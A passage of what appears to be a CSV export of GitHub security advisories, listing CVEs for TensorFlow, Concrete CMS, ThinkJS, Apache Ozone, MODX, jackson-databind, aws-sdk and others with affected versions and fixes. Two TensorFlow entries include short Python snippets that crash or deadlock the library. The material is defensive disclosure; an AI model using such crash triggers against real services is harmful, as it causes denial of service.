'https://github.com/coreos/coreos-installer/releases/tag/v0.10.0'}]","{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:11:09Z', 'nvd_published_at': '2022-08-23T20:15:00Z'}"
+1.4.0,GHSA-rhf5-f553-xg82,2021-11-22T18:22:30Z,2021-11-23T18:18:16Z,,['CVE-2021-22951'],Password exposure in concrete5/core,"Unauthorized individuals could view password protected files using view_inline in Concrete CMS (previously concrete 5) prior to version 8.5.7. Concrete CMS now checks to see if a file has a password in view_inline and, if it does, the file is not rendered.For version 8.5.6, the following mitigations were put in place a. restricting file types for view_inline to images only b. putting a warning in the file manager to advise users.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22951'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1102014'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:21:13Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}"
+1.4.0,GHSA-9crf-c6qr-r273,2021-11-08T22:10:39Z,2021-11-10T18:52:24Z,,['CVE-2021-41218'],Integer division by 0 in `tf.raw_ops.AllToAll`,"### Impact
+The [shape inference code for `AllToAll`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/tpu_cross_replica_ops.cc#L25-L74) can be made to execute a division by 0:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def func():
+ return tf.raw_ops.AllToAll(
+ input=[0.0, 0.1652, 0.6543],
+ group_assignment=[1, -1],
+ concat_dimension=0,
+ split_dimension=0,
+ split_count=0)
+
+func()
+```
+
+This occurs whenever the `split_count` argument is 0:
+
+```cc
+TF_RETURN_IF_ERROR(c->GetAttr(""split_count"", &split_count));
+...
+for (int32_t i = 0; i < rank; ++i) {
+ ...
+ dims[i] = c->MakeDim(c->Value(dims[i]) / split_count);
+ ...
+}
+```
+
+### Patches
+We have patched the issue in GitHub commit [a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc](https://github.com/tensorflow/tensorflow/commit/a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9crf-c6qr-r273'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41218'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:10:39Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}"
+1.4.0,GHSA-q5mq-6fjg-4mw8,2021-11-19T20:42:27Z,2021-11-19T20:42:32Z,,['CVE-2020-21176'],SQL Injection in thinkjs,SQL injection vulnerability in the model.increment and model.decrement function in ThinkJS 3.2.10 allows remote attackers to execute arbitrary SQL commands via the step parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'thinkjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21176'}, {'type': 'WEB', 'url': 'https://blog.jiguang.xyz/posts/thinkjs-sql-injection/'}, {'type': 'PACKAGE', 'url': 'https://github.com/thinkjs/thinkjs'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T13:12:49Z', 'nvd_published_at': '2021-02-01T18:15:00Z'}"
+1.4.0,GHSA-5993-wwpg-m92c,2023-09-25T11:02:40Z,2021-11-23T17:56:45Z,,['CVE-2021-39236'],Apache Ozone user impersonation due to non-validation of Ozone S3 tokens,"In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-ozone-ozone-manager'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39236'}, {'type': 'WEB', 'url': 'https://github.com/apache/ozone/pull/1871'}, {'type': 'WEB', 'url': 'https://github.com/apache/ozone/commit/60e078729e18ef1be276f35659957ac553d266f7'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/HDDS-4763'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/q0lhspolnwfbsw33w98b7b1923n1np4d'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/7'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:05:30Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
+1.4.0,GHSA-43g8-79x3-j898,2021-11-17T21:24:11Z,2021-11-15T17:36:22Z,,['CVE-2021-43564'],Unrestricted access to predictable file paths in hov/jobfair,"An issue was discovered in the jobfair (aka Job Fair) extension before 1.0.13 and 2.x before 2.0.2 for TYPO3. The extension fails to protect or obfuscate filenames of uploaded files. This allows unauthenticated users to download files with sensitive data by simply guessing the filename of uploaded files (e.g., uploads/tx_jobfair/cv.pdf).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'hov/jobfair'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'hov/jobfair'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43564'}, {'type': 'PACKAGE', 'url': 'https://github.com/nhovratov/jobfair'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-018'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:39:33Z', 'nvd_published_at': '2021-11-10T16:15:00Z'}"
+1.4.0,GHSA-9wx7-jrvc-28mm,2021-11-08T21:34:42Z,2021-11-08T21:51:18Z,,[],Signature verification vulnerability in Stark Bank ecdsa libraries,"An attacker can forge signatures on arbitrary messages that will verify for any public key. This may allow attackers to authenticate as any user within the Stark Bank platform, and bypass signature verification needed to perform operations on the platform, such as send payments and transfer funds. Additionally, the ability for attackers to forge signatures may impact other users and projects using these libraries in different and unforeseen ways.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.starkbank:ecdsa-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.1'}]}], 'versions': ['1.0.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.1'}, {'fixed': '1.3.2'}]}], 'versions': ['1.3.1']}, {'package': {'ecosystem': 'npm', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.2'}, {'fixed': '1.1.3'}]}], 'versions': ['1.1.2']}]","[{'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/commit/d136170666e9510eb63c2572551805807bd4c17f'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-dotnet'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-java'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-node'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-python'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/compare/v2.0.0...v2.0.1'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:34:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vhfp-9wvj-gwvg,2021-11-03T14:51:31Z,2021-11-01T19:19:43Z,,['CVE-2020-25911'],XML External Entity vulnerability in MODX CMS,A XML External Entity (XXE) vulnerability was discovered in the modRestServiceRequest component in MODX CMS 2.7.3 which can lead to an information disclosure or denial of service (DOS).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'modx/revolution'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25911'}, {'type': 'WEB', 'url': 'https://github.com/modxcms/revolution/issues/15237'}, {'type': 'WEB', 'url': 'https://github.com/modxcms/revolution/pull/15238'}, {'type': 'WEB', 'url': 'https://github.com/modxcms/revolution/pull/15238/commits/1b7ffe02df30f05dbf67dd15e4d8101687c1585a'}, {'type': 'WEB', 'url': 'https://github.com/dahua966/Vul_disclose/blob/main/XXE_modxcms.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/modxcms/revolution'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:08:06Z', 'nvd_published_at': '2021-10-31T19:15:00Z'}"
+1.4.0,GHSA-c6j7-4fr9-c76p,2021-11-22T18:37:43Z,2021-11-23T18:17:41Z,,['CVE-2021-39235'],Incorrect permissions in Apache Ozone,"In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39235'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C93f88246-4320-7423-0dac-ec7a07f47455%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/6'}]","{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:37:43Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
+1.4.0,GHSA-j6wp-3859-vxfg,2021-11-08T21:37:07Z,2021-11-10T16:52:24Z,,['CVE-2021-41230'],OIDC claims not updated from Identity Provider in Pomerium,"### Impact
+Changes to the OIDC claims of a user after initial login are not reflected in policy evaluation when using [`allowed_idp_claims`](https://www.pomerium.com/reference/#allowed-idp-claims) as part of policy. If using `allowed_idp_claims` and a user's claims are changed, Pomerium can make incorrect authorization decisions.
+
+### Patches
+v0.15.6
+
+### Workarounds
+- Clear data on `databroker` service by clearing redis or restarting the in-memory databroker to force claims to be updated
+
+### References
+https://github.com/pomerium/pomerium/pull/2724
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [Pomerium](https://github.com/pomerium/pomerium)
+* Email us at [security@pomerium.com](mailto:security@pomerium.com)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pomerium/pomerium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.15.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/security/advisories/GHSA-j6wp-3859-vxfg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41230'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/pull/2724'}, {'type': 'WEB', 'url': 'https://github.com/pomerium/pomerium/commit/f20542c4bf2cc691e4c324f7ec79e02e46d95511'}, {'type': 'PACKAGE', 'url': 'https://github.com/pomerium/pomerium'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0258'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:37:07Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-h67m-xg8f-fxcf,2021-11-08T22:25:35Z,2021-11-10T18:59:32Z,,['CVE-2021-41213'],Deadlock in mutually recursive `tf.function` objects,"### Impact
+The [code behind `tf.function` API](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/python/eager/def_function.py#L542) can be made to deadlock when two `tf.function` decorated Python functions are mutually recursive:
+
+```python
+import tensorflow as tf
+
+@tf.function()
+def fun1(num):
+ if num == 1:
+ return
+ print(num)
+ fun2(num-1)
+
+@tf.function()
+def fun2(num):
+ if num == 0:
+ return
+ print(num)
+ fun1(num-1)
+
+fun1(9)
+```
+
+This occurs due to using a non-reentrant `Lock` Python object.
+
+Loading any model which contains mutually recursive functions is vulnerable. An attacker can cause denial of service by causing users to load such models and calling a recursive `tf.function`, although this is not a frequent scenario.
+
+### Patches
+We have patched the issue in GitHub commit [afac8158d43691661ad083f6dd9e56f327c1dcb7](https://github.com/tensorflow/tensorflow/commit/afac8158d43691661ad083f6dd9e56f327c1dcb7).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h67m-xg8f-fxcf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41213'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/afac8158d43691661ad083f6dd9e56f327c1dcb7'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-662', 'CWE-667'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:25:35Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-v585-23hc-c647,2023-09-14T15:59:32Z,2021-11-19T20:13:06Z,,['CVE-2020-36186'],Unsafe Deserialization in jackson-databind,"FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36186'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2997'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1'}, {'type': 'WEB', 'url': 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0005/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:16:26Z', 'nvd_published_at': '2021-01-06T23:15:00Z'}"
+1.4.0,GHSA-rrc9-gqf8-8rwg,2021-04-06T20:37:10Z,2021-11-16T21:26:43Z,,['CVE-2020-28472'],Prototype Pollution via file load in aws-sdk and @aws-sdk/shared-ini-file-loader,"This affects the package @aws-sdk/shared-ini-file-loader before 1.0.0-rc.9; the package aws-sdk before 2.814.0. If an attacker submits a malicious INI file to an application that parses it with loadSharedConfigFiles , they will pollute the prototype on the application. This can be exploited further depending on the context.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'aws-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.814.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-sdk/shared-ini-file-loader'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-rc.8'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28472'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-sdk-js/pull/3585/commits/7d72aff2a941173733fcb6741b104cd83d3bc611'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-sdk-js-v3/commit/a209082dff913939672bb069964b33aa4c5409a9'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1059426'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059425'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-AWSSDK-1059424'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-AWSSDKSHAREDINIFILELOADER-1049304'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T20:37:10Z', 'nvd_published_at': '2021-01-19T11:15:00Z'}"
+1.4.0,GHSA-prcg-wp5q-rv7p,2021-11-08T22:54:14Z,2021-11-10T19:35:35Z,,['CVE-2021-41197'],Crashes due to overflow and `CHECK`-fail in ops with large tensor shapes,"### Impact
+TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` would return a negative result. In the majority of TensorFlow codebase this then results in a `CHECK`-failure. Newer constructs exist which return a `Status` instead of crashing the binary.
+
+For example [`AddDim`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L395-L408) calls should be replaced by [`AddDimWithStatus`](https://github.com/tensorflow/tensorflow/blob/0b6b491d21d6a4eb5fbab1cca565bc1e94ca9543/tensorflow/core/framework/tensor_shape.cc#L410-L440).
+
+This is similar to [CVE-2021-29584](https://github.com/tensorflow/tensorflow/blob/3a74f0307236fe206b046689c4d76f57c9b74eee/tensorflow/security/advisory/tfsa-2021-071.md) (and similar other reported vulnerabilities in TensorFlow, localized to specific APIs).
+
+### Patches
+We have patched the issue in GitHub commits [7c1692bd417eb4f9b33ead749a41166d6080af85](https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85) (merging [#51732](https://github.com/tensorflow/tensorflow/pull/51732)), [d81b1351da3e8c884ff836b64458d94e4a157c15](https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15) (merging [#51717](https://github.com/tensorflow/tensorflow/pull/51717)), [a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf](https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf) (merging [#51658](https://github.com/tensorflow/tensorflow/pull/51658)), and [d81b1351da3e8c884ff836b64458d94e4a157c15](https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15) (merging [#51973](https://github.com/tensorflow/tensorflow/pull/51973)). It is possible that other similar instances exist in TensorFlow, we will issue fixes as these are discovered.
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46890), [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51618) and [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51908).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-prcg-wp5q-rv7p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41197'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46890'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/51908'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a871989d7b6c18cdebf2fb4f0e5c5b62fbc19edf'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d81b1351da3e8c884ff836b64458d94e4a157c15'}, {'type': 